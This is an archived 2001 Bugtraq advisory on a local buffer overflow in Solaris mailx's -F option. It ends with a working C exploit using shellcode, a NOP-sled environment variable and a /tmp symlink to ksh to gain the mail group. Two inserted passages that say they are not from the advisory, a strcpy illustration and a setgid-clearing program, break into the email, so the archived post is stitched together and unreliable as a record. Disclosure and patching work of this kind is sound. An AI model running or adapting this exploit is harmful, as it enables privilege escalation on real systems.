[20535] in bugtraq
Solaris mailx Vulnerability
daemon@ATHENA.MIT.EDU (Pablo Sor)
Wed May 2 22:40:09 2001
Message-ID: <3AF03635.5533E1FB@afip.gov.ar>
Date: Wed, 2 May 2001 12:30:45 -0400
Reply-To: Pablo Sor <psor@AFIP.GOV.AR>
From: Pablo Sor <psor@AFIP.GOV.AR>
To: BUGTRAQ@SECURITYFOCUS.COM
Vulnerability in Solaris mailx(1)
Date Published: April 11, 2001
Advisory ID: N/A
Bugtraq ID: N/A
CVE CAN: None currently assigned.
Title: Solaris mailx(1) Buffer Overflow Vulnerability
Class: Boundary Error Condition
Remotely Exploitable: No
Locally Exploitable: Yes
Vulnerability Description:
The mailx program is installed setgid mail by default on Solaris. A buffer
overrun exists in the handling of the -F option: by passing a long argument
containing machine-executable code, a local user can execute arbitrary
commands with gid mail.
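The advisory does not reproduce the mailx source, so what follows is an added, generic illustration of the bug class it names (a fixed-size buffer filled from an option argument with no length check) beside the bounded form that rejects over-long input. It is not mailx's code and not the author's; RECORD_MAX, record_path and the function names are hypothetical.

```c
/* Added illustration, not Solaris mailx source (the advisory does not show it):
 * the bug class it describes, a command-line argument copied into a fixed-size
 * buffer with no length check, next to a bounded version that rejects
 * over-long input. RECORD_MAX, record_path and the function names are
 * hypothetical. */
#include <stdio.h>
#include <string.h>

#define RECORD_MAX 64                 /* hypothetical fixed buffer size */

static char record_path[RECORD_MAX];  /* where the option's filename is kept */

/* Unsafe pattern: strcpy trusts the caller-supplied length, so an argument
 * of RECORD_MAX bytes or more writes past the end of record_path.
 * Shown for contrast only; nothing in this file calls it. */
void set_record_file_unsafe(const char *arg)
{
    strcpy(record_path, arg);         /* no bound: this is the defect */
}

/* Hardened pattern: measure first, refuse anything that does not fit
 * (including the terminating NUL), then copy exactly that many bytes.
 * Returns 0 on success, -1 when the argument is rejected. */
int set_record_file_safe(const char *arg)
{
    size_t n = strlen(arg);
    if (n >= sizeof record_path)
        return -1;                    /* reject rather than truncate silently */
    memcpy(record_path, arg, n + 1);  /* n + 1 copies the NUL too */
    return 0;
}

const char *get_record_file(void)
{
    return record_path;
}

/* try_oversized: feed the safe setter a constructed RECORD_MAX + 16 byte
 * argument (all 'A', the classic overflow probe) and report its verdict. */
int try_oversized(void)
{
    char big[RECORD_MAX + 16];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    return set_record_file_safe(big); /* -1: rejected, record_path untouched */
}

int main(void)
{
    if (set_record_file_safe("outbox") == 0)
        printf("accepted: %s\n", get_record_file());
    printf("oversized argument: %s\n",
           try_oversized() == -1 ? "rejected" : "accepted (bug)");
    return 0;
}
```

The point of the hardened version is that the check happens before any byte is written and that an over-long argument is refused outright rather than quietly truncated, which is the behaviour a setgid program handling untrusted arguments needs.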
Vulnerable Packages/Systems:
Solaris 8 SPARC
Solaris 8 x86
Solaris 7 SPARC
Solaris 7 x86
Solaris 2.6 SPARC
Solaris 2.6 x86
Solaris 2.5.1 SPARC
Solaris 2.5.1 x86
Solaris 2.5 SPARC
Solaris 2.5 x86
Quick Fix:
Clear the setgid bit on /usr/bin/mailx.
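As an added example that is not part of the advisory, the quick fix above written as a small C program that checks whether a binary carries the setgid bit and clears it. It works for any path, defaulting to /usr/bin/mailx; the make_setgid_sample/remove_sample helpers exist only so the check can be exercised on a constructed scratch file rather than a real system binary.

```c
/* Added example, not part of the advisory: audit a program for the setgid
 * bit and clear it, which is the advisory's quick fix for /usr/bin/mailx.
 * Uses only POSIX stat(2)/chmod(2); the path comes from the command line
 * and defaults to /usr/bin/mailx. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/stat.h>

/* is_setgid: 1 if path carries the setgid bit, 0 if not, -1 if stat fails */
int is_setgid(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    return (st.st_mode & S_ISGID) ? 1 : 0;
}

/* clear_setgid: drop only the setgid bit, keeping every other mode bit.
 * Returns 0 on success, -1 on error. */
int clear_setgid(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    mode_t mode = st.st_mode & 07777;      /* permission, set-id and sticky bits */
    return chmod(path, mode & ~(mode_t)S_ISGID) == 0 ? 0 : -1;
}

/* audit_and_fix: report the state and remediate.
 * Returns 1 if the bit was cleared, 0 if there was nothing to do, -1 on error. */
int audit_and_fix(const char *path)
{
    int state = is_setgid(path);
    if (state < 0) {
        perror(path);
        return -1;
    }
    if (state == 0) {
        printf("%s: setgid bit not set, nothing to do\n", path);
        return 0;
    }
    if (clear_setgid(path) != 0) {
        perror(path);
        return -1;
    }
    printf("%s: setgid bit cleared\n", path);
    return is_setgid(path) == 0 ? 1 : -1;  /* verify the change took effect */
}

/* Scratch-file helpers (constructed test fixture, not a real binary):
 * create a temporary file with mode 2755 so the check has something to find. */
static char sample_path[] = "/tmp/sgid_sample_XXXXXX";

const char *make_setgid_sample(void)
{
    int fd = mkstemp(sample_path);
    if (fd < 0)
        return NULL;
    if (fchmod(fd, 02755) != 0) {
        close(fd);
        return NULL;
    }
    close(fd);
    return sample_path;
}

void remove_sample(void)
{
    unlink(sample_path);
}

int main(int argc, char **argv)
{
    const char *path = argc > 1 ? argv[1] : "/usr/bin/mailx";
    return audit_and_fix(path) < 0 ? 1 : 0;
}
```

Run it as root against the real binary (or pass another path) to apply the fix; audit_and_fix re-reads the mode after chmod so a silently ignored change is reported as an error rather than as success.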
Solution/Vendor:
Sun Microsystems was notified on April 18, 2001. Patches are expected shortly.
Vendor notified on: April 18, 2001
Credits:
This vulnerability was discovered by Pablo Sor, Buenos Aires, Argentina.
This advisory was drafted with the help of the SecurityFocus.com Vulnerability
Help Team. For more information or assistance drafting advisories please mail
vulnhelp@securityfocus.com.
Technical Description - Exploit/Concept Code:
#include <fcntl.h>
#include <stdlib.h>     /* malloc, putenv */
#include <string.h>     /* memset, memcpy, strlen */
#include <unistd.h>     /* symlink, execl */
/*
/usr/bin/mailx overflow proof of concept.
Pablo Sor, Buenos Aires, Argentina 04/2001
psor@afip.gov.ar, psor@ccc.uba.ar
works against x86 solaris 8
default offset should work.
usage:
bash$ id
uid=100(laika) gid=1(other)
bash$ ./mailx-exp
Subject: tomy
.
EOT
[wait...]
$ id
uid=100(laika) gid=1(other) egid=6(mail)
*/
long get_esp() { __asm__("movl %esp,%eax"); }

int main(int ac, char **av)
{
    char shell[]=
        "\xeb\x1c\x5e\x33\xc0\x33\xdb\xb3\x08\xfe\xc3\x2b\xf3\x88\x06"
        "\x6a\x06\x50\xb0\x88\x9a\xff\xff\xff\xff\x07\xee\xeb\x06\x90"
        "\xe8\xdf\xff\xff\xff\x55\x8b\xec\x83\xec\x08\xeb\x5d\x33\xc0"
        "\xb0\x3a\xfe\xc0\xeb\x16\xc3\x33\xc0\x40\xeb\x10\xc3\x5e\x33"
        "\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88\x7e\x06\xeb\x05\xe8\xec"
        "\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f\xc3\x5e\x33\xc0\x89"
        "\x76\x08\x88\x46\x07\x33\xd2\xb2\x06\x02\xd2\x89\x04\x16\x50"
        "\x8d\x46\x08\x50\x8b\x46\x08\x50\xe8\xb5\xff\xff\xff\x33\xd2"
        "\xb2\x06\x02\xd2\x03\xe2\x6a\x01\xe8\xaf\xff\xff\xff\x83\xc4"
        "\x04\xe8\xc9\xff\xff\xff\x2f\x74\x6d\x70\x2f\x78\x78";
    unsigned long magic = get_esp() + 2075; /* default offset */
    unsigned char buf[1150];
    char *envi;

    envi = (char *)malloc(300*sizeof(char));
    memset(envi,0x90,300);
    memcpy(envi+280-strlen(shell),shell,strlen(shell));
    memcpy(envi,"SOR=",4);
    envi[299]=0;
    putenv(envi);
    symlink("/bin/ksh","/tmp/xx");
    memset(buf,0x41,1150);
    memcpy(buf+1116,&magic,4);
    buf[1149]=0;
    execl("/usr/bin/mailx","mailx","-F",buf,NULL);
}
--
Pablo Sor
psor@afip.gov.ar, psor@ccc.uba.ar